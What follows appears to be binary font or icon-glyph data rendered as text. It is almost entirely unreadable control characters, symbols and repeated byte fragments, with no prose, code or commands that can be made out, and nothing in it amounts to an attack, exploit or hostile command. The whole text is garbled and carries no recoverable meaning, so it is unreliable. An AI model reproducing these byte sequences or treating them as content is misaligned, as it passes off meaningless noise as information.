	�O,<Qm�����4&#"676?2"/&"3275#"&462326#2#3"&=46767676=463#2'2"&=463#226=463#3"&=325#5325#2'&'&'567676;5&/"#'&'&'327676?5&'&72"&=463#226=463%676?3#3"&=327$			$*

	$II

�	
	
Ic"
I.D.
��I
3FD��-
	
-	


	

�
"I
.E-��'J 
%!
&)

$R
�

�
�

�



��

�&&�
�

X
'E)
^	"



			*




v
��

�&&�
%%)�

�
)�j�S)�ENXc4'&'&  7676' '&'&7676 4'&'&'&'&#"#"&546327&'&#"#"&54?'3276767632#"'&'3276767654'&'&'&5463276#"'&'&54767&'#"'&54>76?67#"&'.'463234676323276767632767&5467632>32#/32674'&#"#"&546364">'4#"6763276�DCqt��tqCDDCqttqCDA?lo��ol?AA?lool?A7<S
	
6+$$
-/RJN7;
 7;S8-
	
5,#$
!,0SJN7;
 �" &-#'%=;#$/&/ 0 &	 7
G#/	


 !6*"/

0#,f		!�
! 9%/*^�tqCDDCqt��uqBDDBqu��ol?AA?lopl?AA@lo�RJN7<	
 
6<R;* 
	
5,25	E?SJN8;
	 7;T8+ 
	
6-73E?;%!&B.
)!W(6!""6*



( #
$N"2		
+
!?!"$&:/D.&
	
	$ ,"/,
*:$"� +(;2����"&*v{�3&'&>27&'&#"7676?3?37#7"7#7##7##&'&#"7#373267'#"&737>'33733733267'#"&737676'&'>#>n)!#F": /#I#"8I8[JN`,II 0"J7I,5:jIJ
-59k�)l)k3
- '1	h��V��7"AAAA'%��C

bbbb




$A
	


��
(1ES���"276=4&!"264&"&462%"264&"&4627+";676514'&+53%&'.26=3333301327350373575726=4&#7>'&+";;264&'#";"&54762>&/&#"327676=4&��**;**"��**;**#�$	
&#��++

�BJ	T>L]�"&
	 
�	n	
m	*<*+:+s#$s*<*+:+s#$s
l
F
V:BBuK/.KupV
Y	6	
	
	

$

)	�o�M+<JWd%'&7676767676'&'&3267676'&"327676'&7676'&>'&'&7>'&'&M8/*DA2;6�PV:@nFLK3i%'S �:.("*85"$	�b
Q#��
4/�A+;#,$""*(%#*,029I@JH�%)8/29	�.*Y.+:='.��$".0"
#,(A�@"$$iD(*!$!.
�/3GOpy��"264&"&462'3"&4627&#"32767654'%3#7"'7'&'&#"32767''2&76'#.#"32673#"'&'3276=#"&462'"264&"&462U"00D00"&�SL55I%2";##;"7"(##�m -.#	
I�
//
!")%�"00D00"&�.F//F.�**j#6L6#":D:#$
k�-	.F/
	d

0C0


*�~++�.F//F.�**��+=Obt���"#";+"=432324+";276=47#";276=4+"'&=476;2%"32736=4;243#";276=4+"'&=476;2%4'&+"276=32765'+532�5,
H*3H�221
1%~$
"
�321
1%���n )pp`	E	F		&
(		(#K	(
!B
B
(		(#K	(
 	y	)1����c%'&"'&'.>76?6'>.'.#&&'&'.#+67&7.73#67676?#53�AJA�?C0F'@��\	
̜?'*GY�8wgCM51k-R
9	: 
T5wiD '%62i)<7�K$,
;M�	4J��s$)H�6LI�DG,7S?durZM\	D,-E]N@cxs-+Fp1C9/-@@�����>KXajs|�'&'&76.'&'&'4&'&'&'.'&'.>6&"2>4.".4>2"&462"&462"&462"&462"&462�6(!	 59	$5�K�jrG��WO�OO���OO�OBoAAo�oAAo    �  �.  �  �m$1- 93[L�

eD}
&1'7J)?��!
$L��$+$$+$y� �    �J?KOYn�7!3332>54&"'.4632327654&#"'73#>32'##3#!5'3##535#533535#54.#"5#3#!5+5354'&"3#535#5367623�	��2!*.9?b6�1($($
`$��		0!&(%(ܸ>""�bb��!!�!�!"7"�!!�,��  �A,!����,@1Y86�/7'�`3
6*D�T����A��KrK�KK,@%;"
t���+KJ

DKK�K�2%l������'N�&'&'&'&'&74767676'23676767676'4'&'&'&'&'&'767>76767>3#"&/&'&'&#�|KM?]
d->���^:!]
!eF%C�y?/3P
R#Z���-/_	ZB]a�0$!=/."1!$	
	G(95'	9\,D��E(a


!b%
�F4d"K2��W2U

]$Hr�E2Z
 t�G�� 7% 2B_��P�n
#	 1�j�RGQ#:#"'6?#+'736#327676'&'&6?#&3�.(
4
#	j]	3'89]�n�1310�k��	 B t$F�tqCDDCqt0.fR@o!��I�mP�?��eh�gc��]�c�DCqttqCD�{C�U���X!'717������X���������.Gn�#'"'&'&'&7476?676'&/&/&=&76767676?6766?67>&'&'&'&'%6?67>&'&'&'&'�')/-)'+?,
F#*&(&<(Q -	""!
�"C-	""!
�&=
X+J$+
&#)4*#D1		 %
P)0
	#%%&2M?f_D

-%
	
&$	
B,
_D

A-%
	&$	
>0
����;W�����%37676?67>'&'&/732?6/&'&/732?6'&'&'&/3?676?654/&'&'&/&'73653676'&'&'&'&'&/767676=&'%6756&/&'17367>%#37676769>Mq1




!"0*4(�>�@;fHWH

1rJ@(4*/"!



	�2,L

;
	K,��%)):+!L&0A6


�B(P�� +9	�,B/9 ",1FHZX(;+0'
	�/B,WZHF2," 8�HM�L

"'-49@GOOG@94-'"

L�M�
0
$�		


$!	

+-�$	�26P+"&=#;52>=#&#5#35676;2354'&%3#%#+"&=#;527>5�	.	ON"O��3OO	.	O�OO�P

/	P
M		��%
(�	l���

��w���		��

&���\ 9Qj�'&'&'&'&76767676376767676'&/&/&7367676'&'&'&%>76?676#&456'&'&7367>.�zB)%
5Fh8EHC�vF/3):Fe<=$?
!u{d`+#J*�o
-GD�q	 
(VR48!�G	*(VH:;\
8+'-33*$/.&*-@@.#,�"K	(��)!
Y
�!mt
&$&N#Y0F%%%I%�(29BJSZ^bfou|���������������������!5##5!#7##5674;#5#+"'&'#532%5!2#!55!'5322'53%53#57#5%47674;!#532#6?532#53!#5%53%#5731#""53+"5&#53272'53#5#53!#5'#553'3##53#5'53353#/33"5&������	���R�R���*�� ����
�����/�����֖Ć	�͉3��͉��G#	cJ�Z4XY�T�SS+R�T�TSSSSSS'R�R�R�)
>&(�

	h�
R�5
k��5�
3��k
���QQj6k*	�i�R.DTiv&'&'&'&'&'&76?327>76&'&'6?67>'676767>327.&'67676"2>4."&462_
!!
��U
*sD8+
 PFC\�3B
M4$2*D"/	)<!mI{	
4.$Wj5,U^2R'L�QMHE./(E((DRD((E((99P99!;-*	/36

EJ	
%F?" %#~MR?
-"�a&-$"9�2A'14DF[�(EPE((EPE(�9P99P9	�^�SCVi������6''&''&'&7'&'&7'&#&'&67>'&767667667676&'&7>.7>/.'&/&'&'&'&?6767672767>76'.'45'&'&6276&'&'&#2>&":(+))vCH'*!D?@F!2"% =+m8	$ $!)>++$,(#<-�^.
!!%E(0%D"%!,6$BL&	�()	:$%
9
))"F
�	*_/)
/&J�	>-/� F
j"02D01w2&O2($+(%?/1&$$ GB@G+KA&#W%.*GB%-,c�n8!39(9p
�8*F9	@	-.$+	9(�
�
)/$$
!!EQ�I&%?�
5&Hg!0D10D1�-Y���!"'&'&47676 %6&+";2&=4&?24+54>&+"32.=;2'7;54&+"=6;66=4&'#"=4;26=#"6&+"32&?>;2;'&#"?��soBCCBossoBCCBos�lTT�"SQTe�.$$.
�Kr+EW19��Y��%&X'%%'X&%�]
]
10*
]
 (~
\
& $vvG�($3Ogk733673###;2#+76376?6='4'&#%67676'&'+13656='.'1"%3#���[#A&	d(6(5Dh		"3"Zd��gg��=z=z�r������(E	
�!D�
�!	%
��8			g��r�c$/3@KXchmy���5!5#!!3!3#7'#3535#732764'&#+53273#%"2764'&"&4627"2764'&"&462"24"42'4+3533'2'#532%3"&4627&#"32735#3"&47627&#"32735#%5#35#537#5!�7�!��s!!u!# &0)


-!!2 


?

 
� 


?

 
5
�b	


0�	
0��RR2!%YB!��-��{B9{@@{99{
I>A){};;b"	"	b;;b"	"	
%(

!J(
!J{	����;z����!%0#"'&'&'.'&7676?52?6767676=64/&'&'&'&'&'&/&#&"767676767667676&'&'&7676'&'&'.5&373254'&""767>232=4;;2=4'&'&+""#"37354+"/54;2=#"=6&54&+"%"#"=4'2;2=4+">,3CMB>,/')#1@
" 0(49G*18,O5D9�	,(	-#%( YQ#$
XY4<*.-&8F*
+9'3��
-	
>)
"T61



�L'-j�"$
.��2/�
9#'. %/%%-&'"2$G$		

&'
)8C%!$53D 
	
)!$	
y�
��cB!�(b'2��	���-/����C"27673276764'&'&'&'&'&'&'&54>3247632�tqCD-,O)J9IMR�tqCDDCqtg
2$*##*$2)E)4)E(�32UWfRKG5i=%32UX�WU23��	!((!
)E)/&#)E)���n=BG%&'&/&'&'&'&2&76#&?676##"7>376767637273676'&637676&'.'.'&/&'&'732&'&#'"'&/&'&/#"'&'&'&76/7&'&'/&#"'&7676767&''&'&'&'&#+"&?>&'&&47>76&+&6767632+3&/&6736'?6326;7&�
&(7�f��""


	

( 
$5P*K
	",+

#	
			
#' :C
<1!!&!
(1	#

	

 -
#(#A&	#��F�&%�MQ�

S,S
	
		

	J

	1

	

		



0
	
	

	
#	'R"H		�^jR%Mm������&'&'&7676?676'76?6765%'&'.76?67664'&'&6767676'&'#&'&676?62;76327'&'&4767273673676'.7676276767'&676767676.5�+!
 /3
#
�

&�-
	
 3����
	B
"
-#			d��	

YR	
(��?W
$+me��	z	*H<F>

	$x<cN^Q
7[��
�E38

*�OE$$'#!&)(1:!$!
 
��

96. %D

07 5	�5

�
	%
L
	

��
!
�<1


-
x���6m��?676767676767'7676'&/&'&7#'&'&'&''&'&'776?676'&/''&'&'&'&57676767'&7676776?/&'&'&7'&'&'&'76767676376'&'&D�
$$

$


$P		
���

 #%Q	���
$$

$


$Q
	
���

 #%Q	���
 #%Q	���
$$

$


%Q
	
���

 #%Q	���
$$

$


$P		
���&Ekx����	#:&'&422654&"#"/&#27654'764&"5'4'&"276=2654/22764'&#327654&""&46'"26=4&764&"5'4'&"276=2654'%'654.+"26=3264'2764'&+;264'&+53254&+5'&+";276=32654&4.+";276=326654/&'&+"26=264/&"276732764'�
	

	(

t

�	


J		=

�

p,

5%
��%
�


~#"d

			

	

G
#
	1



"E

E7
G
#
	

D


4G	!	7		7
			7		7
,		D

GI	�X@h"264&%#54&"2653/7#64&"55#54&"#326735732654'%'764&"55#54&"#326735732654'�""/""�+*�_D-a+)V(^C-a*)Vc!0!!0!8��C*_��wDs
C*_��wDs
��W%&'&/.#"3267#"'&'&4767632>4'&'&'&'.54632.#" K0,_mB;c::c;>g&);=EQFC'))'CFQ]�&6!H8(?")'WJ`1@)#-
'7" 5[5%!H�:G;dvd;@5Y3)(CF�FC()aX~J$.7>-DSW!+!	>02Q-���E5r���Iau{�"&#"&#"&'&"732732732767676756'&'&#"'&'#&'#"&''.'&76767632676326326327"131264&"&462'"'&/&#"'.#"'4&'&#"?326?326?32767676&6'&'&'476767>2763"'&54767>7632#6%#"&5476767632"'&76&#"3267'&'&767676%&'&5&76767632712654+3523/&'#532"3267676DD/&O;-#4&'F7&@3=)%4=,$9I7<&B.&%#&-H&E'0 -"D*/7%(.,+@E+LA


�G*C5	*-%

#3,&@!5 4:%C
!F+$6�$&&
�
!F%")#"&)8(-

$;*0	'	
'
"G"
).9
�0C&'	=293>&.;/'@(.,$4�)>](2!#	$.%";1711	#
$#4' b
.1	
!

!./70:D(! %!
"0'[7.7:��
	$
6/406 @%%""&;3/"!	
;&(+'*#@#"7%h		/"K,
(4Y+#�i�
';>	��
&17A\dt"32676'&"'&7>2%&#"32676"'&7>2%37'#3767"'&=7654'&#"32?67'>32%&#"3763769-:
6-:
1
�6,;
7-:K��A.�<b)�nt0+9	/)+)	=,A&.BA{

4
LBH�/!"C`'6P2	
0[QEJ�A3Vu����"#!7676323/""&75&372362327+"676372'.7>767#"#&'&/3726767673+"75&;2#76&'#&=45&62#"'&'&637276./&'.67>&#"'.%41#&"3332=4&��#W��
	aekQc�		D"	-�\)+&!�		9
%D**3	

�&


C		
	��
A	�eZY+1���	^	
C
		- #+(
? 	uQ!#��	�




^
����W!"&4767676&'&#"32767##"'&'&567676727!276767654'&'&�p42!�B
5J7Q	ZR�f[?916ix��m`?M5SYn�eY.)+2Yh�		$WQ	*3�	

8@�5IHd:3	`dIf
# 94C<>[OX29,&D12-NEQIEN/6
-wq"+)-+*><C3:�j�SEN" 7676'&'&#3".54767632&#"32767672=!5!"&462�tqCDDCqttqCDDCqt�(;���v@98_arL�k::k�LcUS45��*?�9#2##2#RDCqt��tqCDDCqttqCD�X'��qt;??v�Tra_89':k���k90.PRb'T��##2##�� %�q���+-1�������'?###01"0101010133'35#&#/01#&+##0"109"8101#9"1"1#81#010181"1"010135472?6;52='&5'5'5#50&='01'5'5'#'4#'01'5'01#&#5#'#'#5###"#01#+#1+1+1+####0"1###01010"1#010109011#"13233323213301301302132?5"=015014'501#5#0&"&#1&"1'#'01'#50#501'01'50#5'0153265'#54676;0130300213810314='5'50#5#501'01'#'01'#4#5'5#'5'01'0"'#&#10&+'#81#&"#01##0101##09##01###"1"1"101#0101101321030102131;53251373637017325137343537525343575?5431575750175#'#+&"1#'#'#'0&"1'5"51#5#5#501'5476;;010101303121381301312535'415#5#015"51015'541#5#4#501'#4&15"5'41'41'"5#'5#'#&#5#"&1#'81#"'#01##01###01#01#01010101013734;3010210101#81'#01#01#04+01#01#015#81#01'##01#01#01#01##+01#09"9"1##"#1#"109010101#1#0101010101"0101##30210133333301330133327>=6#'#5#0&#1&#5"/#'01'01#501'5"='01546;'9#01'54'501'01'5'81'0"1'50"5184"1'01'01'01'01'04#/01#/#01#01#"1#01#5#3533030330338135"5'=#5015#5'5'5#5'09&5#5'#'501#4#5'#4#5'015'01'#81'#81'#015#0&"1'#81#5#5###81#01######01###1"1#1#####011"11"1322333333337373'5#'#01#01'#'01'0"5'5"41'01501'5015326=01#54631230130133333013813'109074+5#5#101#50"1#01#5#01##01#"1##01##01##0#101"101#011"7535#546;'35'15015'5015"=#5&5#'5#5#'01#5#04+41#01##01##0"1#01#1###0"1"1#30113213;3013370134;7350:5134352535757575735'�+(-d*a9.	�{


	
�6y%/
$z0%�%#a'%%QHBN���Gzt
	(R%
JO
	G#%
	
R/F�ytL
#	m��%1"��	�����$:j#%33!4'&'&!"'&'&=#2%#%323!2654.1#!&'&53326=4&"#54&"#54632632���t0.OR_0.OR�ZMK,-twZMK,-����f?	GyHi$3HyJ-A��0(,H,�&5%L$MH2/$$/2H���ZLK,-6ZLK,-��**FHU�'**FHT��$��BpB)!�BqB��.(,>���%3- �����2H""H2�5
�j�R�Q���$APZ%#"'&'&/&#'&"'&'&/&/.76?676/&676;2765767&'4716?6?676?67676/&>767637351212#&'&5476767>/#76?54'547676326564'&'&/&5'&/&5'&'&'4'&'&'&'&'&'&#*"767>%&'#&/&/&?6?67676?6'&/./"'&/76?676/&/&/&3676?7676'&/."3'567632222?67636574'&'&'"'76'&'&%2376<'&'&7'&'&7>73'4&'&4&#'3�	
1<6!
#22 

!


	
	


(

��
			"	
"$H/



	
 	


		
"4?
�
	
$;


��+	"9
	(

!"
		

x				��	fv		

*
	
.


%)+	
 @<=:

,"!'
0+
!


�	
	)+#	*	8

		A
	M' *	
	��
 	
�	
	( 3
!	�&		

		

		

	�!0		


21#�	

�r�Jls��&'&'&'&6767'&'&/&#&'767'3&'676767676767>'&'&'%7""'&'&'7676767676'&67676�}p8)7C9K.% )#
#:'4)@
"		#D&K
����7K1-%
	]!zY{O=AC0:,B�
��I		�*0%)#<C"3"(E:05-
2.BÇ"


	 #�>	
	$	

O+F!FZ`(�k&0\~�v^jT")
�sC4/��/J
&�B06($-1#%>%.��	);FRU]`f#35#737#7&"2>4&#"'.4>2767>'.+3533'2'532+35#535#535#773733'75#35�mH�.5-	")"�_:-/	\I	
I��mQQm�G3iKWJ.""X���H2
-0
,,,f		' &�::<.P+*�%%�ZBB#}��v�F+	'>37!2&35!2#!7##!73635!2'��G�4-��!B�$G��T�f�Tv>Vq�y:2o;[��:"���i77�-AA-�.��77�Śc�E::#����3E|�"#$"&546736:'&'&7156&"3265%2372'&#&'&/&6767>'&'&'&&?676&#""&764754'&26'&54,W���|�{	k00aO[NKLD#9.
��	

()Q�QM�s	t[
(6#@
&%0�&\\	��	)%
%$
#E$$	
!
�����$	1	
	
>�
			
	���;����&76767626&7&?67654&#"7676765&'&#"&'676&"#&7676&&7676'.76."74767>'.'.7676?767676767632776767727676.7276762>6763226'&676326'&767676.#"5&'&'&6'&676Q���{^-Jsw���R
#'$($0"4
	

&


		
	
	%
&28

�	�D	
�
	 

(	n	!*'C&0	
-!*U
	 

	
@.

H
 
,"#
, 	}:*#&6!9&U$	 &	#'

('|>_"%��&0Vf�������'#353735#"632&#"3267354#"&463274327&#"#"&'32654'&'.7"5#356323543"632.#"3267354#"&46327"5#35264&"&'5>3273#74&"327'#"&'3'>2`#=,+*+<�"
''	T





	�''

'C!''�
''
/$

;''�#7%%"WWV]�pppp�+
	
'

M0]	
,		
	

)=�OGW&
	
'
M0]	R<�";"]%��:%$#������5N%&'&'&767676'&'&/.7676766767>'&'&�i�lW���e965�4;7�
_0i6>}>2
	
jZ���8%	��!D4X-6R��Z5"'M3<�*M�\W\}aa$NKnkV�8��	#%az$	
@:\y#_;L<+N3("

C00K
(/���."&'&#"3476762347676234'.'&�A:8('8:B943N}#%U$$}#%T%#}N34RO��OREB󝣲ݽ�lofd���̮�dfol��ݲ���BE��iS$7E '&'&7676 &/&'&'&6?>767�EBrt��tqBDEBqutqBD\r�\T����	���~���XE1	����^�trBCEBqutqCDEBqu��.J$"E:��-e�Imu
��M
B< ��������{��>&'.#"7>>'&'&'.76767>76&/&'&'&#"#"'&"+3267>54'.767>>76.'&#32.'&'&'&/.7>7>76767>642762462>2265467>7>76#&'&/3# 

#


�o		((
		#
'+# 
"	

#	4!�6H
#/I	.
�~ 
	 +8 

 
'	1
(@R""��-1^�H)0"`0M*0+)%#*8%!4;Y?8(Ep
Z"
h)A"�		!

8"4
0'sWA4"
	%		7	'"'(FDzx0#	
"�j�R!!45!!!!!�$�$���$�$v�$��$���$�����#!2>4.#".#""�EuEDuEGk=EuD>g=9aEv�vE<_7EvF=h><e?���#VW?654&'&'#"'#&#!#"#6'4/&/%&'.76=4'6'565676763!��	6��	7,���C^T$���1',��1%P	
�%#6	
'�e/B,39r�:  \
�
��i�SB#"'&'&7676 '#>?6?6767676?67>27#�EBru��tqBDEBquuqBE���

	E	
C
�^�uqBDECqutqCDEBqu���	$%&

,-V
X��
;l%776?3276&'&'&'.>767632&#"#"'76'&#76'&#726763267632�E & AW
 & 
 &�{/08	

+1:.19
	
	*2:�9	
"	-c9	
"	-c[*$*$?���$$�	

	!

#	

	!


�}�}�





��\nS'&7>76f�_�]ZZ;:eg\�"#�mok���_^*+x\^�j�R&4BK".4>24."#!2>4."4."#!#"!5#654.'264&"�-M--MZM--M�-MZM-N�!9!!9B8!!85=i|i=���%>%%?%*::S;;-LZM--MZL-�-M--M-���!8B8!!8B8!��>h==h>�v�)%>%��%>%;R;;R;��G��	#!&'!32726?63!#&'&/4&'&7276'&76767267676'&'&'1&754&5&5&>?67676'.##&/&16767676?6767676765474?6?676?67676767656&'&'&'##.��%J: ���aX	O.

	
	
	��

	)	
		+
!
		,
�			
(		"�			
9��( >< ���c	O�!	
	@
C!
�	
O,/	

	

	
(G/

	<


���g
'	4�:	
�	�
	
%�y=����O��8>\}������-6AIOYckt|��������������'0:DMU`hr{�����&5&'&'&/#"767676732767676'&/&6?676?47'&/767676727&'&'&'&'&?2?6''&767676762?66767&56'4?#'&'&+1#3'&=47;'&7&/&+1;'&576;23?'&'#"&?305&/&+"3'&576;237'&'673'.7632'#&?'&0#&#'&#6?63767>%73'&'&'&7>367/&'&'&637&'&765676"72567&/&'>'7./7676'&%0'+675&%&'&/.#>%?'&'4#47"&/#47'&67&'>?&%67"6?&4#"326%264&""32654"256&326&27&"24'"'24"325&#""264&%2654#&'6767&'064'#5'&"064&#"275"'#36572?5'""2?4&'64&"265'7265'2?5'&"275'&">4/2?5'"%0264'%265'#275&'037>/64'#0/"27"374&275'""?5?5'"+667&'3'8GDN#$G:M67
 9-$ #/;IF	86�KL; "#1(VDY1,4+hNEPLTH#T)-i?(0;
 
9
T+19G:AmZ?,`�bK #&4~M��3@6
9A�.G
11A
S�
 32at�#	7=0
		��%$))		.*64&
- B7
��F�
	
	�
	#

 ��6"

&�	
$�	�
�

�


�
�
�Gw��	�j9�����z���}LT]~�&\��/��=X�
�6#��:��9''6$-MO\.S
>c+ 	+ 2su�=<4,+1,) �B<uVD<:865.5G/#+9D"

<:~a1%
A-C87%2#SB
/�66K(-
uL`
tg

)2$'.?o
)$6
/
#


)x(*+'!
,7#. ED%
P�		R$"OG*
*4C

�����`	

	��U$!UM�WQ�;���S�<+4)�) �kY��l��S�jRR*74&#%"3$265&"#&546372Q	����

FD
{��
��		]<�	�#�#	�Q	
�

|��~
����,<Paq%&'&>76&#&"&54>&5&?6&/&'.766767676?>'#'".67>676?6#'�p0#!< w	&;#,

N=,$~	bs:#!�$V�$9#0�����"8E[�m	W+�!J72K��6
!A- <!j�-q 4/>��+-�eDP(O$88+V�!Q)%(3*?=�%&@C>~=]1'9$	��2LQ]����&&/.7637'&'&#""'&/#367674'&&/#35'&6?33&'#?%6'76&'&76767637'&/&'&3267'"'53237#527#237'%'"'53237#5237#237'3'&=3237#5237#%!76767'!'&/&'&+232=4'531;'&5�	"

 	
	&#9/+.8K!$��"


	
��$4%yg�
$3%
yh
�7	#1$
w���
�#!
	0,#*M
	'
	*
"K&g�	A67�	�"
$-

."%*h
,
."%*h
,|j5"%*		
Y7!
	o2*.7	
	��Jfl����#";26=4&326=4&#54&+"#";;26=4&+"&=326=4&%"32676&+"#"&'3254'&>24'&#"32676&+"#"&'32'>2%26=4&#!"'.+";265';26=&'&5432;2654&"#"&'.+"327654&		.��l"#"�|,5, 4
}["n/,, 3
}�"���j	\	!


,-
V(

.H,"3$!��		�(	 ::^%
W)+<)O))+&f
��	�		�PR
�l


!
	#!��&4CJ#'#7'5#2;535#535#363535#'#76756?5#675535#535#!#5'�+*,4*-3�,��#33;f�'(z�7+2(W#C&33;f�*"D<�DE}�LS�z��]&C((��(��������''@&C(�'���~�>4Oh"+&?6?676;2#"#"=4?6763;6#232#&"/&/.743"#"'&/&=46;2#74j�8����i<!A�cb%��T*�k$J��Z�T96k��:t�/��0�q"B�mk*�\-�-v(P��Cb�[-;v� ���.7676776?6%3�h��.!+N;%352$*��	,��	
+F#45!8
+2@7p��	&;?EIQT'#3535#7#";267>=4'&'.+.=476;27353#3'73#7#3733'7�`S0aR0�RRNNA2�CU\Geo22�?Y8b:� 7v�xx�==	j07��LRTJ���>99��%Qq�5636#"'57'&'&'&#"'76#"'32767#"'!&'&'&'&/7676767&'676767676755&'&'&'&'u.-&%
'&/+$
U"$@>53)%'&1.62qjOf	,4	5`Y�Is��+$
(*
	�$(/28<24)(	"&).191)$�;$�#
H



�Y #!77(Y	,(%-N��R/

4		�13''�����#d7&'&76767632767>+'"'&'&767676.'&'&##&&'&'&/&'&6�Z%,eQspsvW�� 

4CZ-


G+'(fKb_k20B/U
'N]/ 	



hbpw�\IDsֺ�

	
17PG`S�~%/6=a[�fH9

���W����4546'&/376?6/&/&'&'.&/&/&'&7>.?6.676.'&76767676"26.2"&4626.+"�jB
	"'8;)Qi	
D$R#j;31#(
)##N*	5SP;!$Sfp$,1hz�##1##"
,
!$
#
	(
'	!%	i$>!#.*0
!/*EL9:(?HP:H&"1##1"""-

��)5AQe3'#762#'#!5#;7%264&+3532+3'"&46;2#'264&+"3"&46;#";7"&'37#>;7#";7�B#@NNC!q��lRFJ$2�&&K&&H&&YHY�ixHY&%LJ9fzzju$�j@**&5&&5&""&5&"

&5&��(?CGQ\�������"3>327273&'54'&"&46767%#"&46323.#"3267'3#53#"2654&"&54>'4323&#"#"'&5#32764'&'&'&'"3>327273&'54'&"&46767%#353264&#532%"5#354632354!"5#35432354�$	

$)	

'!"�((((� "3! 
	
�%3
	%	a$	

$)
��F-  
	�
%%
	(�
&()�		 
Z3>i�5U
7!
$
	
#	"		 
Z��/.H#

j7
<A-
j7		<A-
����"8Ggp����#";2?46;276&+76;2%#";26576;276'&+76;2#"'&#"3276?;2?6&"&>2%#"'&"3276?;26?4&"&>2%#"'.+";2?6&%;26?6&+"�N(	M!	��N %		M	�&!0		!	7!!\%?0
"7 "��%4%)'&|�  $��9J'I4:�6	J I4
+ 	�H8+ #�H!9LIy7�C���j�S0F[6&'&'"7$7>7676'&'"327676'&'&&'&7676$s�"~c^bG
�&�+:"FA`1P@7�Z]X^�*&%�l�tpBC�pv��tqBCECrt���DH@?nqtpCEA@or�
JKG�u|i�?
�c
EU	
�VMXOLI3
 FCqv���DGECquupBD�!}lrtpCEA?or��soCD	��$(MYbh3#'#5#35335#'"353264'&#5632%3#%42/&#"#"&'327654'&'&'&'"3532>'&#5632%#37#{66]866855�$6&,.	�66>3	"'	#%
	�$6&+.	��6b4��jF�EE��*&DjH&f��	'3	)	
	9�*%EjH&f�#�h�S?U���?cp����'-7B67654'&'&'&77675676'3176767.3265'467>.'&#"?>.'&?136?6?7167&"/6?676&'&#/&#"?3767627>76?6&#76'&#"7676"676?67%&'#?6?6&#?6.'#&?6?6&'#"'&7676&'"&7676?7>'#676?%67>&6.6'.6?;6.7>725?26&'#%276/&'&/476767676?676'&'&#6?6&'#3767164&"35323"5'4'#532'1"264&"&463127 
 


 2

*�%	&	B=	>
	q		&!R4%<(%%
	2+	&%T
	
*)�u

K
/
$5',B86k
-		]�&)�
��B $0
		
Z

	�


�	
	

8��>�u1ab	 p

ks	!A7d��
	E��	��G}oxPy($><	�c|

	)
	


(.9@		JC�	
�	1(
.`:
\=%&	
E



��.-Y%"!& %)$3	

	0/
<O(HZB1B2%

&��


(
	
		7
 "�[%Bm

%)S��
	

	-#9K
0/	
(�'

	 		������4P''&'&/5'767676'.'&7#&'&747>7376?�#+*:/:&+

L%_oLkO+0"$$2)�R��'.T5<4/�X�+- 'B�	
"'0.&"� ��S %*1
%&7$i-!4Y0
�����6?76?6?676'&'&5.'&'&"/&/.'&/&'&5467637>&'&'&/.76?67b
	45)2!?EA`4'@	4# 
	!


#	_'&eV?

#/&
7				�	'57N>!S"
)$8##* )

	

&"Gie
B

					
�����c���&'&#6?676767676?>'&'"#/&#&#"32?'#"/"36?3#&#&"37273/&#"27;'&#"2373#&#;276?#&"32?2'&#"373676#&#&#&#"32?227676?&/&'76367>?&'&'&'63>72767&'&'&'567676767'&'&'676?5&'&'767&#'"'&'.673763?5/"/>767637675'?676?67627676'6767676?67.#'"32?2635";767275/"#��k�x"!.7L2F=
��H,;~?p7�	*T�
	�S$'-,�O		
	$H/\
B=?

�	;t 	<'N	=
	
	)
		8o�

z�N
(P�M	N'ad
N(�
"	(	
	#220+.&"*2+y!$.7;6- J%	�
*3O�"Q
Xw��c
	�/
 �L�

2cM��l7"E�
�(,;O

/'
;g		
%	
 			
		
#	


!

;F��Ga

 $"7���i�RI2"/&47676&'&'&762&/&/.'&'&'&'&767>76�ma_@C&`�'113EIHE024nI72	�:X`0(`ke\Z@B52�e.R/.RTj��S:DAz+-79��\	
	nL%4",.-NObA:ra\{�j�RHz���6767>7625.5462654'&'&"&'&'#&'&/&'&7&'&'&'&/27676767676767635&'&54767624&"2674&"26$'rIL�LJr#2#%$-41VX�XU23/ 
	�(C9J<C10&:831,*$##$*,138:&01C<J9C,�\Y�.,LM�NK--�  Y"0""0"�2Ip  qI�"" �1 
NY`RP.00.PR`[P �h1% 
�
	
		
	
�
 %<:3pl4=<YMK+--+KL&l!!0 !�-|`u����������67>&/&'&67>7##"'#&322#'&'.'&'&/./47635.'&'&/4#'&#7'4#&3676;2"/.#&'#&'"'&/&/&6;62?6'&'&'&'5&#'""'&?4+#"725672727676?67'#&#&&'&#>76767476376/&754&'.7676?6&#&#"&7477676767673767676?676&'&/&'"5?6?5#"#&?676?676767&2#&'&/2"'.'&&'&765#&">76?'"&76'4'#636'5'676765&6?>5&?6&'&/4"#/"'#&'26?6766'.'3762765&/&76?6&76'&'&"264#32.""/.732#2#&/&6&'"565473%72#'&>"5&/4762%"&?6�	



		


		%



@eg>#

&

	

	
	







	
 0;�+


EoQ4!



			IgS0
F
����:�����2��L	�

	
	

	

	XW
	




	#
	
,2�

		 
#^
	F%
			TJ			+
				8



u

"
		���#9P&#&#'273676?&#'&#"276767621?6767'";+Ux
@?aaEQ=U<�y��/���WC=AS�
KeC?=�	+C
`	#�UE)!>>-*
2-	!l���/#,5>HQ[dmv�������������� )2;DMV_hqz��������������
%.7@IR[dmv��������������!*3<ENW`ir{���������%>..>>.7>.>.'>.>..7>'>..>7>.>.7>.>.'76&.>.>'>.>.>.7>.'>.>.6.66.6>.'>.7>.7>.7>.6.6>.%6.6%>.6.6>.6.67&>&7&>&&>&6.6>.&264'6."26.6'6."264&"6'64&2264&">4&%264&">.%&"26464&26.6264&7&"264%>4&"64&2726.>.>.>.'>.>.>.>.>..>'>.>..>>.>..>.>>..>'>..>>.>.>.'>.%>."264&'>.>.7>.7>.>.>.>.>.7>.4&"26>.7>.6.6>.%>.%264&"&>&>."2>&%&>&&>&'&>&�	
:


�
$	



	

�


�		b�			


4			'.

L�	
�

		�	#
	dD	���
�
			�p		
	w�

k	V	
	�p!
��
b*+OL\

	

��E

B

	u
�		

		
^

		
�
�

		S
p

=

	��	
	
@	
	�

f���
S
E
	
�
�O
f	
�h

�	
:

�"P)Q&&��		�
:"�
�&���%B"))�
v		��&&Ly����"�		f���		s�	







��



�
�			�
�
	�

	�	\U		4\

&
�	
	�

��


.
��D	��*�				B		?	�Q	
	29
3�
		(
G


M		�	*
��	�
�	X=	
��
		
{'

C
	
	bxQp

I


�
			4

�	



h
	

�

��
�

	
�

��
�
iy	
�'

�
�	
���	

�
	���
r
	�""�))D&��	~b""�&&�

��&&p""�){

